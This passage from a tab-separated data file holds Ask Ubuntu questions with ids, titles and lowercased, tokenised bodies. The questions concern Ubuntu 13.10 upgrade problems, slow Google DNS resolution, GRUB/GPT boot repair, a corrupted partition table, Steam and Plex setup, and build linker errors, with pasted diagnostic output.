far right as possible , the mouse cursor appears at the left side of the screen . it can travel up/down , but not to the right . i can travel left `` off '' the screen , and seemingly pretty far .
362600	internet works perfectly - except google	after installing the proprietary drivers for my ethernet and wifi by realtek , my internet is as fast as it was on windows before - except when i 'm using google . loading any google site is even slower than the normal internet speed with the default drivers . even then the problem was there . this only happens to google , independent of the browser ( firefox , chromium , even elinks says searching host for at least 20s ) does any one of you have the same problems ? does anyone know a fix ? $ ifconfig eth0 link encap : ethernet hardware adresse b8:70 : f4 : d0:52:08 inet adresse:192.168.0.100 bcast:192.168.0.255 maske:255.255.255.0 inet6-adresse : fe80 : :ba70 : f4ff : fed0:5208/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx packets:22659 errors:0 dropped:0 overruns:0 frame:0 tx packets:17586 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:20225533 ( 20.2 mb ) tx-bytes:1998427 ( 1.9 mb ) lo link encap : lokale schleife inet adresse:127.0.0.1 maske:255.0.0.0 inet6-adresse : : :1/128 gültigkeitsbereich : maschine up loopback running mtu:65536 metrik:1 rx packets:32666 errors:0 dropped:0 overruns:0 frame:0 tx packets:32666 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenlänge:0 rx-bytes:2372372 ( 2.3 mb ) tx-bytes:2372372 ( 2.3 mb ) wlan0 link encap : ethernet hardware adresse d0 : df:9a : eb : af:28 inet adresse:192.168.0.101 bcast:192.168.0.255 maske:255.255.255.0 inet6-adresse : fe80 : :d2df:9aff : feeb : af28/64 gültigkeitsbereich : verbindung up broadcast running multicast mtu:1500 metrik:1 rx packets:2442 errors:0 dropped:0 overruns:0 frame:0 tx packets:617 errors:0 dropped:0 overruns:0 carrier:0 kollisionen:0 sendewarteschlangenlänge:1000 rx-bytes:726915 ( 726.9 kb ) tx-bytes:61394 ( 61.3 kb ) $ ping6 -c 2 google.com unknown host # i 'm not using ipv6 yet $ ping -c 2 google.com ping www.google.com ( 173.194.116.50 ) 56 ( 84 ) bytes of data . 64 bytes from 173.194.116.50 : icmp_req=1 ttl=56 time=10.0 ms 64 bytes from 173.194.116.50 : icmp_req=2 ttl=56 time=22.0 ms -- - www.google.com ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 15014ms rtt min/avg/max/mdev = 10.001/16.011/22.021/6.010 ms it says that it only lasted 16ms , but it took quite a while to resolve the host ... $ host -v google.com trying `` google.com '' ; ; - > > header < < - opcode : query , status : noerror , id : 1812 ; ; flags : qr rd ra ; query : 1 , answer : 11 , authority : 0 , additional : 0 ; ; question section : ; google.com . in a ; ; answer section : google.com . 297 in a 173.194.116.40 google.com . 297 in a 173.194.116.34 google.com . 297 in a 173.194.116.36 google.com . 297 in a 173.194.116.37 google.com . 297 in a 173.194.116.33 google.com . 297 in a 173.194.116.32 google.com . 297 in a 173.194.116.38 google.com . 297 in a 173.194.116.39 google.com . 297 in a 173.194.116.35 google.com . 297 in a 173.194.116.41 google.com . 297 in a 173.194.116.46 received 204 bytes from 127.0.1.1 # 53 in 11 ms trying `` google.com '' ; ; connection timed out ; no servers could be reached trying `` google.com '' ; ; connection timed out ; no servers could be reached
362606	removing unwanted unity-lenses , dash plugins in ubuntu 13.10	how to remove unwanted lenses such as : files photo music video i think the home and applications lenses are enough for me . and one more thing ; in ubuntu software centre > categories > themes & tweaks > dash search , all the dash plugin in unity can be found there . can i simply remove from usc ? does it remove in unity as well ? thanks in advance ! ; )
362607	ubuntu touch boot problem	i 've recently tried installing ubuntu touch on my nexus 4 . i 've tried it via adb on windows and via clockworkmod recovery alone multiple times . my drivers are installed ok , i flashed different roms in the past . the thing is the install does complete , i have no errors flashing both zip files ( the mako one and the `` universal '' one ) , but after i hit reboot , it shows the google logo forever . i can revert to an android update i made , so it 's not bricked , i just do n't know how to make it boot ubuntu . please help me out guys !
362608	how to put desktop icons in ubuntu 13.10 ?	i 'd want to put firefox , rythmbox and libreoffice in the desktop , but ubuntu does n't allow me to paste them directly , what can i do ?
362609	lucid lynx or saucy salamander ?	i 've got a macbook from 2008 , which blue-screened , onto which i installed ubuntu 12.10 from the ubuntu magazine disk . it is slow . it freezes continuously . it only runs select internet pages well ( like gmail is constantly unable to run script ) . i 'd like to know if there is a problem between the software and hardware such that i should and could pick an older version of linux ( like lynx ) and install that , or if installing from the magazine disc really is n't enough ( like that 's all i did , just the disc and called it good -- it makes it seem too easy ) .
362612	libboost-all-dev did n't generate the '-mt ' libraries	i have installed the libboost-all-dev package , and can not find the thread aware libraries i need inside my /usr/lib/ directory . ( libboost_system-mt.a ) are the library files that are n't suffixed with -mt thread aware ? ( as none of them are suffixed )
362613	how i install ubuntu 13.10 in a computer with windows 8.1	i want to install ubuntu 13.10 on a windows 8.1 computer . i go to the boot menu and on the first boot it 's written : windows boot manager nothing . i select nothing , but the computer go directly to the bios , and i do n't press nothing ! what i do ?
362615	software & updates not opening in ubuntu 13.10	i entered sudo software-properties-gtk on terminal but software & updates not opened . and this command ( sudo software-properties-gtk ) shows this error . traceback ( most recent call last ) : file `` /usr/bin/software-properties-gtk '' , line 101 , in < module > app = softwarepropertiesgtk ( datadir=options.data_dir , options=options , file=file ) file `` /usr/lib/python3/dist-packages/softwareproperties/gtk/softwarepropertiesgtk.py '' , line 98 , in __init__ softwareproperties.__init__ ( self , options=options , datadir=datadir ) file `` /usr/lib/python3/dist-packages/softwareproperties/softwareproperties.py '' , line 109 , in __init__ self.reload_sourceslist ( ) file `` /usr/lib/python3/dist-packages/softwareproperties/softwareproperties.py '' , line 599 , in reload_sourceslist self.distro.get_sources ( self.sourceslist ) file `` /usr/lib/python3/dist-packages/aptsources/distro.py '' , line 89 , in get_sources ( self.id , self.codename ) ) aptsources.distro.nodistrotemplateexception : error : could not find a distribution template for ubuntu/trusty . also i want to mention that just few day before i upgrade from ubuntu 13.04 to ubuntu 13.10 . and also shows 14.04 error rather than 13.10 ... . thanks in advance .
362616	zoom extensions not working in chrome since upgrade to 13.10	recently made the upgrade from 13.04 to 13.10 and now some of my favorite extensions in chrome are n't working including smart zoom : https : //chrome.google.com/webstore/detail/smart-zoom/emfkpabfhchapdbfcmphhcagnkdloanp/details and 4chan plus . i 've tried uninstalling and reinstalling the extensions but no joy . any suggestions would be appreciated .
362618	how do i fix unsatisfied dependency and install chrome in 13.10 ?	when i try to install chrome i get the error message dependency is not satisfiable : lib32gcc1 ( > = 1.4.1.1 ) . what do i do to install chrome ( version 30.0.1599.101-1 ) ?
362622	is the sputik kernel project only for dell xps 13 ?	i read that dell sputnik kernel is necessary for the correct usage of the hardware in dell xps 13 ultrabook and xps 15 ultrabook . do you know if the dell sputnik kernel is necessary on dell xps 14 ultrabook ? as all this laptop should have similar hardware . a .
362624	laptop shutdown during upgrade	my laptop battery died last night during an upgrade from 12.04 to 12.10 and now , when i switch the laptop on , i get to the loading screen but no further . no obvious options appear on screen where i can boot into safe mode etc . it just freezes on the load screen . anyone know what i can do to get it up n running again ? cheers
362625	strange noise appears from my sound columns after upgrade to 13.10	i have upgraded my ubuntu 13.04 to 13.10 . i have also installed windows 8 . i do not know if the issue is cause by the w8 , but each time i switch from w8 to 13.10 this strange noise started . the fix i have found is the following : pulseaudio -k pulseaudio -- start but i have found it very irritating to do this each time i have started the ubuntu . has anyone idea how to fix this in long term ?
362626	best linux distro to install on an usb flash ( full installation )	i have installed ubuntu 12.04 in my usb flash ( 8 go ) it seems too slow so what is best linux distro to install on an usb flash ( full installation ) ? : )
362628	how do i fix a corrupted harddrive after failed upgrade ?	the problem originated when i was trying to fix this problem . things went horribly , horribly wrong and i ended up with a new problem altogether . the last thing i did was run sudo apt-get install and that caused my system to freeze . i restarted my computer and it would not boot from the harddrive . i ran a copy of ubuntu 12.10 from a flashdrive that i had and ran gparted to see if my partitions were all there . it returned this message : invalid partition table on /dev/sda -- wrong signature 5208 . the drive appeared as a 2tib unallocated drive with an error . the drive had 4 partitions before ( plus random unallocated space ) . there was a fat32 partition , an ext4 partition which contained ubuntu 13.04/13.10 ( i do n't even know which one at this point ) , an extended partition which contained a swap partition for my ubuntu partition ( i was meaning to move that ubuntu partition into the extended partition , never got around to it ) , and another partition ( i do n't remember how i formatted it ) . i should also mention this is a 1tb harddrive . so in short , i have a corrupted partition table on my primary harddrive from which i boot from , how can i fix this ? i tried mounting the drive with sudo mount /dev/sda1 /media/ubuntu then i changed my directory to said folder and tried to list files and this monstrosity happened : $ ls ls : can not access ��w�j^� . : input/output error ls : can not access � ? ( � �x ? .| : input/output error ls : can not access 6w_ @ � ) ? ._ ? ? : input/output error ls : can not access hb0v ? ? ? .a } � : input/output error ls : can not access ? ? ? .�x : input/output error ls : can not access t ) �.+�l : input/output error ls : can not access ? h @ � . @ : input/output error ls : can not access > ? @ � ? .��� : input/output error ls : can not access m ? ? ? . ? � : input/output error ls : can not access @ if� ? a ? : input/output error ls : can not access ? m ! vn $ �. ? ? n : input/output error ls : can not access ? o� � ? .bm` : input/output error ls : can not access ? : i ? ? ? m. : input/output error ls : can not access w ? ? . ? ? : input/output error ls : can not access � : input/output error ls : can not access ? w�s ? ? : input/output error ls : can not access ? v ? k ? . ? ? ? : input/output error ls : can not access 5 ? $ < n�� : input/output error .x����. ? ? i : input/output error ls : can not access je ? ���.j ? 1 : input/output error xjd ? .��� : input/output error ls : can not access w ? ? n� ? ? . ? : input/output error ls : can not access �^x. $ '' � : input/output error ls : can not access ! � ? * ! ? �j.� ? : input/output error ls : can not access '-� ? k ? ^� . ? �� : input/output error ls : can not access b�w ? w ? b.\ ? ? : input/output error ls : can not access o� ? ? � '' z . ? �b : input/output error ls : can not access ��b�h . ? 3- : input/output error ls : can not access � ? . $ 7 : input/output error ls : can not access ) ? ? k.bk : input/output error ls : can not access s ? �z ? . ? ( � : input/output error ls : can not access �f @ ? 0 ? . @ � : input/output error .�d : input/output error . ? � : input/output error ls : can not access ? � ? ? � . @ : input/output error ls : can not access ? / ? � ? .�� : no such file or directory ls : can not access rk ? p4q ( �.�k : input/output error this looks promising . this is the output of fdisk -l $ sudo fdisk -l /dev/sda warning : ignoring extra data in partition table 5 warning : ignoring extra data in partition table 5 warning : ignoring extra data in partition table 5 warning : invalid flag 0x5208 of partition table 5 will be corrected by w ( rite ) disk /dev/sda : 2199.0 gb , 2199023132672 bytes 255 heads , 63 sectors/track , 267349 cylinders , total 4294967056 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x44fdfe06 device boot start end blocks id system /dev/sda1 113305600 894715903 390705152 c w95 fat32 ( lba ) /dev/sda2 894715904 1489307647 297295872 83 linux /dev/sda3 1489309694 1497307135 3998721 5 extended /dev/sda4 1497309184 1953523711 228107264 7 hpfs/ntfs/exfat /dev/sda5 ? 3013257822 3688738171 337740175 aa unknown
362631	i am having problems after upgrade	hi i am a newbie and am having problems after i have upgraded from ubuntu 13.04 to 13.10 the menu does not work and the bar on the top is not showing . the only way to get the computer to work at all is to log differently where the graphics are not as good and then it does not work properly .
362633	using installed fonts in gnome-terminal	recently i have been messing with gnome-terminal to make it look more appealing . i tried using installed fonts that were in my ~/.fonts folder ( installed with font viewer ) but when i edit the gnome-terminal profile , the installed font does n't show up . the font that i am trying to use is cure.se.ttf , and every other program that allows font changing works , as well as it being intstalled globally . am i installing them wrong , or is there a certian place they need to be ?
362635	allowing for ssh access of ubuntu 12.04 server from pubic ip	i have recently configured an old pc of mine to run ubuntu 12.04 server to be used as an ftp client . however , i want to find out how i can access it from a remote desktop ( i.e : not on the wireless network at home ) .
362642	my ubuntu 13.10 gets hangup for a 2 second on opening any application why ?	whole screen gets dim and desktop get hang for 2 sec . on opening any application . my ubuntu is completely updated . what might be a problem . this happens frequent more while watching video on youtube or some other like that . system config dual core 2.1 64 bit 2 gb ram intel hd 3000 graphic card 500 gb hdd
362647	missing `` install alongside '' option	i tried to install ubuntu , but there is no `` install alongside '' option . i have only 3 partitions on my pc and 1.1 tb of free space , but still : no `` install alongside '' option .
362648	enable mobile data ( 3g ) ubuntu touch nexus 4	i have installed ubuntu touch on my nexus 4 , using the manual flashing method . i am now trying to enable mobile data , it did n't automatically configure . is there a way to do this manually , bearing in mind that i do not have access to an ubuntu desktop . my cellular provider is lime ( barbados ) nee cable & wireless . thanks ! gavin
362649	cant mount sd card/	i have an 8 gb microsd card , with an sd adapter . i am using a virtual box to run ubuntu 12.04 . when i start up , ubuntu doesnt mount my sd card and i dont know how to do it manually . any help would be highly appreciated . thanks !
362650	difference between linux subdirectories	i am building a computer and installing linux of it . i am considering of getting : a small capacity ssd for frequently accessed files ( such as the os and programs ) , a small capacity hard drive for frequently written files ( such as temp files ) , and a large capacity hard drive for backup , and various media ( such as music and movies ) . so how should i divide the subdirectories so that i can minimize wear on the ssd but keep my computer fast ? below are a couple of websites i visited , but i still need clarification . thanks in advance , sam . table 3-2 of http : //www.tldp.org/ldp/intro-linux/html/sect_03_01.html http : //www.pathname.com/fhs/pub/fhs-2.3.html
362653	my clock has disappeared	so i have looked online ( believe it or not ) and i ca n't seem to find anything to help me with my issue . my clock just disappeared . here 's a screenshot !
362655	steam issue on 13.04	i 'm running the linux client for steam on 13.04 . initially things seemed to work fine , but then steam froze , and i had to force it to quit . i started it up again , but then it prompted me to update various 32-bit libraries . after doing this games now hang with a blank grey screen . i then re-installed my drivers after reading threads for similar issues , no luck though . then i added /usr/lib32 /usr/lib/i386-linux-gnu/mesa to /etc/ld.so.conf.d/steam.conf . that `` fix '' however created a new issue , `` opengl glx context is not using direct rendering , which may cause performance problems . `` , a known and common issue for 64-bit os 's . so i then ran sudo apt-get install ia32-libs in terminal . still no change . i removed the lines i added to steam.conf , but no change . after reading several boards , i 'm kinda at my wits end with this one .
362656	how to change permissions of a hdd partition to suit plex	i 'm a total newbie when it comes to linux ( brought up on windows but fancied a change ) . i have converted a spare machine to a media server using windows 7 , but it got very very slow to the point where i could n't use it any more . anyway to cut a long story short , i swapped to ubuntu ( the latest stable version 13.10 i believe ) today and i 'm trying to use it along side plex ( i 've read great reviews ) . so far , i 'm pretty sure everything is as it 's meant to be . ubuntu is running so smooth and quick in comparison to windows 7 and i 've installed plex . that said , i ca n't seem to get plex to find any of the folders i want to share on my media partition . someone suggested i change the permissions on the partition to suit plex , so i 've right clicked on the partitioned drive icon and set the sharing options accordingly as i would have done with windows . i 've noticed the permissions tab , but ubuntu wo n't allow me to change the permissions for the group ( which i think is what i need to do ) ... please can anyone advise me further ?
362658	alarm clock for ubuntu	i 'm looking for a good alarm clock for ubuntu ( 13.10 ) . i currently use alarm-clock-applet , but that does n't have a nice tray icon . i 've also tried alarm-clock , which has no tray icon . i would either like a replacement or a way to replace the icon .
362661	ia32-libs on ubuntu 13.10 , where is it ? how do you run programs that depend on it ?	ia32-libs on ubuntu 13.10 , where is it ? how do you run programs that depend on it ? please minimal terminal , make it simple . a few have n't a clue about the depths of ubuntu beyond the software center .
362662	how to give rights to windows user for linux created folder ?	i am having an issue with some linux generated folders on a cifs network share . this folder is created in linux , but i am unable to delete it from the share from a windows machine . permissions were set with chmod 777 in linux . how can i give access to the windows users , without having to `` take ownership '' from the windows machine , and give full access rights through windows ? sorry , a bit of a linux noob here .
362665	error partitioning a toshiba mk3265gsx hard drive that use to be an external hard with ubuntu 12.04	i recently removed a toshiba mk265gsx hdd from an external hard drive case and then installed it in a lenovo thinkpad t510 which previously had the factory hdd . i then attempted to install ubuntu 12.04 using a bootable usb thumb drive but during the install i received the following error : '' error ! ! ! input/output error during write on /dev/sda '' the disk utility has two values for smart status that seem to change back and forth each time i boot from thumb drive : one is simply , `` not supported . '' the other status is that my disk has bad sectors , 2047 it says . i then posted on this ubuntu forum and was told that it 's most likely an issue with the partitioning of the hdd and that i should partition it myself . so i tried to partition it using three different tools : the disk utility , gparted , and the `` do it yourself '' during partitioning . i do n't understand why the automated partitioning piece of the installation process did n't work so that 's a question , but moving on . the disk utility keeps telling me that there 's an error and the detail is something like , `` daemon is inhibited . '' then once , i got the following error message : '' error creating partition : helper exited with exit code 1 : in part_add_partition : device_file=/dev/sda , start=0 , size=320072933376 , type=0x83 entering ms-dos parser ( offset=0 , size=320072933376 ) msdos_magic found looking at part 0 ( offset 0 , size 0 , type 0x00 ) new part entry looking at part 1 ( offset 0 , size 0 , type 0x00 ) new part entry looking at part 2 ( offset 0 , size 0 , type 0x00 ) new part entry looking at part 3 ( offset 0 , size 0 , type 0x00 ) new part entry exiting ms-dos parser msdos partition table detected containing partition table scheme = 0 got it got disk new partition added partition start=32256 size=320070288384 committed to disk 7134 : error writing 131072 bytes : inappropriate ioctl for device can not scrub filesystem signatures at offset=32256 and size=320070288384 when i try partitioning using gparted , it does n't matter how many times i create a partition table , it always starts with an value of `` unrecognized '' next to partition table status . then , when i create and edit the partition in preparation for installing ubuntu , the operation is unable to successfully complete and i 'm given relatively little feedback beyond a generic error message . when i try `` try something else '' during ubuntu installation it acts as if my partitioning and formatting was successful but then errors out in the end . i 'll add this error message later since i did n't write it down when i received it . based on this information , can anyone direct me towards how to troubleshoot this issue . i 'm not necessarily looking for the end all solution ; if i knew more about troubleshooting issues such as these then i think i could solve the problem . i 'm new to linux and struggling to get started .
362667	xubuntu 13.10 : disabling suspend on lid being closed	i 'm having trouble with configuring my home server . i have an old lenovo x200 laptop that runs xubuntu 13.10 . my problem is that after closing the lid the laptop is begin suspended despite changing all lid-related options in power management to `` nothing '' . how to disable all actions ( except turning the screen off ) on lid close ?
362668	how do i turn on file sharing	how do i turn on file sharing ? i can not put a check mark in that box.i can only put a check mark in the box for blue tooth .
362669	dual boot windows 8.1 and ubuntu 13.10 on hybrid drive	i have an acer aspire m5-481pt-6488 that has a hybrid drive ( 20gb ssd and 500gb hdd ) that i want to dual boot ubuntu 13.10 on along side of windows 8.1 . the problem arises during installation and does not give me the option to install ubuntu along side of windows . i have followed a couple of forums that ended up with only booting into windows after installation or vice versa . how do i accomplish this dual boot and keep the windows boot loader ?
362671	keybourd layout shortcut key does not work in 13.10	normally i use neo2 layout and persian layout together with no problem . today i upgraded to 13.10 and now i am not able to assign shortcut key for changing keyboard layouts , like alt+shift . the new setting dialog ignores my entry . moreover there are times that the typing layout and language does not match the selected language . another frequently happening problem is that when i switch layouts the left shift key stops working . these problems started with ubuntu 13.04 and now are even worse in 13.10. i never had such problems with earlier versions of ubuntu . how can i fix these new issues and have a working shortcut which works among all languages and layouts as before ?
362672	ubuntu touch installation on old pda	i have one old pda ( acer n330 to be more specific ) and i want to install on it ubuntu touch ! is this possible ? ? is there any available step-by-step guide ? ? thank you very much .
362673	how can i restore my sublime text after upgrading from 13.04 to 13.10 ?	how can i restore my sublime text after upgrading from 13.04 to 13.10 ? after upgrading i noticed the sublime launcher was missing from my unity bar . can i restore it without reinstalling sublime ? version 3 i think .
362679	modifying files for game controler	i need help opening my files for modification in my computers program files i have a nyco game control i have the file i need to change but i cant change the permission on the file so i can write of replace it with the modified one i need a walk-through for the beginner i have googled and googled with no luck i have tried everything and i do n't know what to do , short of re-installing ubuntu
362682	403 error after upgrading to apache2.4	after upgrading from ubuntu 13.04 server , the www pages wo n't display themselves . error 403 forbidden you do n't have permission to access / on this server . i 've changed access control saves from apache2.2 to apache2.4 , but that did n't work . what else could i do ?
362684	how to install stage 3.2.2 on ubuntu 11.10 64-bit ?	i am unable to install stage 3.2.2 on ubuntu 11.10 64 bit virtual machine . i get the following error message after using make : can someone please help me ? a @ ubuntu : ~/stage-3.2.2-source/build $ make [ 74 % ] built target stage linking cxx executable stage cmakefiles/stagebinary.dir/main.o : in function `main ' : main.cc : ( .text.startup+0x304 ) : undefined reference to `fl : :run ( ) ' libstage.so.3.2.2 : undefined reference to `fl_file_chooser : :value ( int ) ' libstage.so.3.2.2 : undefined reference to `fl_alert ( char const* , ... ) ' libstage.so.3.2.2 : undefined reference to `fl_shared_image : :get ( char const* , int , int ) ' libstage.so.3.2.2 : undefined reference to `fl : :repeat_timeout ( double , void ( * ) ( void* ) , void* ) ' libstage.so.3.2.2 : undefined reference to `vtable for fl_box' libstage.so.3.2.2 : undefined reference to `fl_window : :size_range_ ( ) ' libstage.so.3.2.2 : undefined reference to `fl_file_chooser : :shown ( ) ' libstage.so.3.2.2 : undefined reference to `fl_text_buffer : :text ( char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_old_shortcut ( char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_text_display : :fl_text_display ( int , int , int , int , char const* ) ' libstage.so.3.2.2 : undefined reference to `fl : :e_x' libstage.so.3.2.2 : undefined reference to `fl : :remove_timeout ( void ( * ) ( void* ) , void* ) ' libstage.so.3.2.2 : undefined reference to `fl_gl_window : :show ( ) ' libstage.so.3.2.2 : undefined reference to `fl_gl_window : :hide ( ) ' libstage.so.3.2.2 : undefined reference to `fl_window : :resize ( int , int , int , int ) ' libstage.so.3.2.2 : undefined reference to `fl : :wait ( ) ' libstage.so.3.2.2 : undefined reference to `fl_choice ( char const* , char const* , char const* , char const* , ... ) ' libstage.so.3.2.2 : undefined reference to `fl_widget : :window ( ) const' libstage.so.3.2.2 : undefined reference to `fl_gl_window : :init ( ) ' libstage.so.3.2.2 : undefined reference to `png_init_io' libstage.so.3.2.2 : undefined reference to `fl_file_chooser : :ok_label ( char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_png_image : :fl_png_image ( char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_text_buffer : :fl_text_buffer ( int ) ' libstage.so.3.2.2 : undefined reference to `fl_group : :begin ( ) ' libstage.so.3.2.2 : undefined reference to `fl : :scheme ( char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_gl_window : :draw_overlay ( ) ' libstage.so.3.2.2 : undefined reference to `fl_gl_window : :~fl_gl_window ( ) ' libstage.so.3.2.2 : undefined reference to `fl_menu_ : :fl_menu_ ( int , int , int , int , char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_text_buffer : :~fl_text_buffer ( ) ' libstage.so.3.2.2 : undefined reference to `fl : :check ( ) ' libstage.so.3.2.2 : undefined reference to `fl_window : :fl_window ( int , int , char const* ) ' libstage.so.3.2.2 : undefined reference to `png_set_rows' libstage.so.3.2.2 : undefined reference to `vtable for fl_gl_window' libstage.so.3.2.2 : undefined reference to `png_create_info_struct' libstage.so.3.2.2 : undefined reference to `gl_font ( int , int ) ' libstage.so.3.2.2 : undefined reference to `fl_file_chooser : :show ( ) ' libstage.so.3.2.2 : undefined reference to `fl_menu_ : :global ( ) ' libstage.so.3.2.2 : undefined reference to `fl_shared_image : :release ( ) ' libstage.so.3.2.2 : undefined reference to `fl_window : :hide ( ) ' libstage.so.3.2.2 : undefined reference to `fl_widget : :label ( char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_window : :fl_window ( int , int , int , int , char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_file_chooser : :~fl_file_chooser ( ) ' libstage.so.3.2.2 : undefined reference to `fl_check_button : :fl_check_button ( int , int , int , int , char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_widget : :default_callback ( fl_widget* , void* ) ' libstage.so.3.2.2 : undefined reference to `fl : :e_keysym' libstage.so.3.2.2 : undefined reference to `fl : :delete_widget ( fl_widget* ) ' libstage.so.3.2.2 : undefined reference to `fl_button : :fl_button ( int , int , int , int , char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_window : :flush ( ) ' libstage.so.3.2.2 : undefined reference to `fl : :e_dy' libstage.so.3.2.2 : undefined reference to `gl_draw ( char const* ) ' libstage.so.3.2.2 : undefined reference to `typeinfo for fl_window' libstage.so.3.2.2 : undefined reference to `fl_scroll : :clear ( ) ' libstage.so.3.2.2 : undefined reference to `vtable for fl_return_button' libstage.so.3.2.2 : undefined reference to `fl : :remove_idle ( void ( * ) ( void* ) , void* ) ' libstage.so.3.2.2 : undefined reference to `fl_widget : :fl_widget ( int , int , int , int , char const* ) ' libstage.so.3.2.2 : undefined reference to `fl : :add_idle ( void ( * ) ( void* ) , void* ) ' libstage.so.3.2.2 : undefined reference to `fl_window : :handle ( int ) ' libstage.so.3.2.2 : undefined reference to `png_create_write_struct' libstage.so.3.2.2 : undefined reference to `fl : :add_timeout ( double , void ( * ) ( void* ) , void* ) ' libstage.so.3.2.2 : undefined reference to `fl_window : :draw ( ) ' libstage.so.3.2.2 : undefined reference to `fl : :e_y' libstage.so.3.2.2 : undefined reference to `fl_text_buffer : :insert ( int , char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_menu_ : :add ( char const* , int , void ( * ) ( fl_widget* , void* ) , void* , int ) ' libstage.so.3.2.2 : undefined reference to `fl_window : :label ( char const* ) ' libstage.so.3.2.2 : undefined reference to `png_set_ihdr' libstage.so.3.2.2 : undefined reference to `fl_widget : :redraw ( ) ' libstage.so.3.2.2 : undefined reference to `png_write_png' libstage.so.3.2.2 : undefined reference to `fl_group : :find ( fl_widget const* ) const' libstage.so.3.2.2 : undefined reference to `fl_gl_window : :resize ( int , int , int , int ) ' libstage.so.3.2.2 : undefined reference to `fl_scroll : :fl_scroll ( int , int , int , int , char const* ) ' libstage.so.3.2.2 : undefined reference to `fl : :e_state' libstage.so.3.2.2 : undefined reference to `fl_window : :fl_window ( int , int , char const* ) ' libstage.so.3.2.2 : undefined reference to `gl_draw ( char const* , int , int , int , int , fl_align ) ' libstage.so.3.2.2 : undefined reference to `vtable for fl_menu_bar' libstage.so.3.2.2 : undefined reference to `gl_height ( ) ' libstage.so.3.2.2 : undefined reference to `fl_gl_window : :make_current ( ) ' libstage.so.3.2.2 : undefined reference to `fl : :e_number' libstage.so.3.2.2 : undefined reference to `fl_group : :end ( ) ' libstage.so.3.2.2 : undefined reference to `fl_register_images ( ) ' libstage.so.3.2.2 : undefined reference to `fl_file_chooser : :fl_file_chooser ( char const* , char const* , int , char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_height ( ) ' libstage.so.3.2.2 : undefined reference to `typeinfo for fl_gl_window' libstage.so.3.2.2 : undefined reference to `fl_gl_window : :invalidate ( ) ' libstage.so.3.2.2 : undefined reference to `fl_button : :value ( int ) ' libstage.so.3.2.2 : undefined reference to `gl_width ( char const* ) ' libstage.so.3.2.2 : undefined reference to `fl_gl_window : :flush ( ) ' libstage.so.3.2.2 : undefined reference to `fl_text_display : :buffer ( fl_text_buffer* ) ' libstage.so.3.2.2 : undefined reference to `fl_window : :~fl_window ( ) ' libstage.so.3.2.2 : undefined reference to `png_destroy_write_struct' libstage.so.3.2.2 : undefined reference to `fl_window : :show ( ) ' collect2 : ld returned 1 exit status make [ 2 ] : *** [ libstage/stage ] error 1 make [ 1 ] : *** [ libstage/cmakefiles/stagebinary.dir/all ] error 2 make : *** [ all ] error 2
362686	how to fix gnome-sound-applet error	whenever i try to launch gnome-sound-applet on my ubuntu 12.04 64 bit , i get the following error messages : /usr/bin/pulseaudio : error while loading shared libraries : libpulsecommon-1.1.so : can not open shared object file : no such file or directory ( gnome-sound-applet:6244 ) : sound-cc-panel-warning ** : failed to connect context : connection refused /usr/bin/pulseaudio : error while loading shared libraries : libpulsecommon-1.1.so : can not open shared object file : no such file or directory ( gnome-sound-applet:6244 ) : sound-cc-panel-warning ** : failed to connect context : connection refused the libpulsecommon error seems weird to me ; if i type locate libpulsecommon i can see that the object file is correctly installed : /usr/lib/i386-linux-gnu/libpulsecommon-1.1.so /usr/lib/x86_64-linux-gnu/libpulsecommon-1.1.so why is n't the library correctly recognized ? maybe i have some wrong permissions ? how can i fix this error ?
362687	juju debug-hooks , how to run hook in debug terminal or get more information ?	i 'm having trouble deploying the havana openstack charms on precise for cinder , nova-cloud-controller , and quantum-gateway . i 'm using maas running virsh managed kvm machines . i 'm getting errors with the install hooks . i read that you can use juju debug-hooks to try to find the problem , but that you basically get given a terminal to the machine so you can do whatever the hook would have done by hand . i 've seen a blog post that said you could run a command in the terminal to run the hook . i 'd just like to get some more visibility on what is failing , so i am thinking that if i can run the hook in the terminal , i might see output that tells me what is happening . how can i manually trigger a hook in a debug-hooks terminal ? or is there a better way to find what is causing a charm to fail to deploy ?
362689	empty grub and gpt problem	i 've got a dual boot ubuntu/windows 8.1 on my machine . since i updated windows to 8.1 my grub menu disappeared . i already tried to follow at least 5 or 6 guides and answers here on askubuntu , but nothing seems to work . i ran ubuntu using live usb , i used boot-repair but something went wrong . if i click on reccomended repair i get this error : gpt detected . please create a bios-boot partition ( > 1mb , unformatted filesystem , bios_grub flag ) . this can be performed via tools such as gparted . then try again . alternatively , you can retry after activating the [ separate /boot/efi partition : ] option . so i tried to set my sda9 ( i think that it 's the ubuntu system partition , since it 's ext4 ) with the bios_grub flag and then to run boot-repair again . it did n't work . i do n't know what to do . my grub was working fine ( using uefi ) before i updated windows . edit : i removed the bios_grub flag . then i used fsck and it did n't find any error . so i tried again with boot-repair but it always gives me the `` gpt detected '' error . my boot is on uefi mode , secure boot is `` off '' . when i boot my pc with secureboot off , i can reach the grub menu . but it 's empty ( the only voice is `` system setup '' ) . edit2 : another useless try . i mounted my ubuntu system disk : sudo mount /dev/sda9 /mnt and the other things : sudo mount -- bind /dev /mnt/dev sudo mount -- bind /proc /mnt/proc sudo mount -- bind /sys /mnt/sys i logged on the system with chroot : sudo chroot /mnt i re-installed grub : grub-install /dev/sda update-grub2 but it still does n't work .
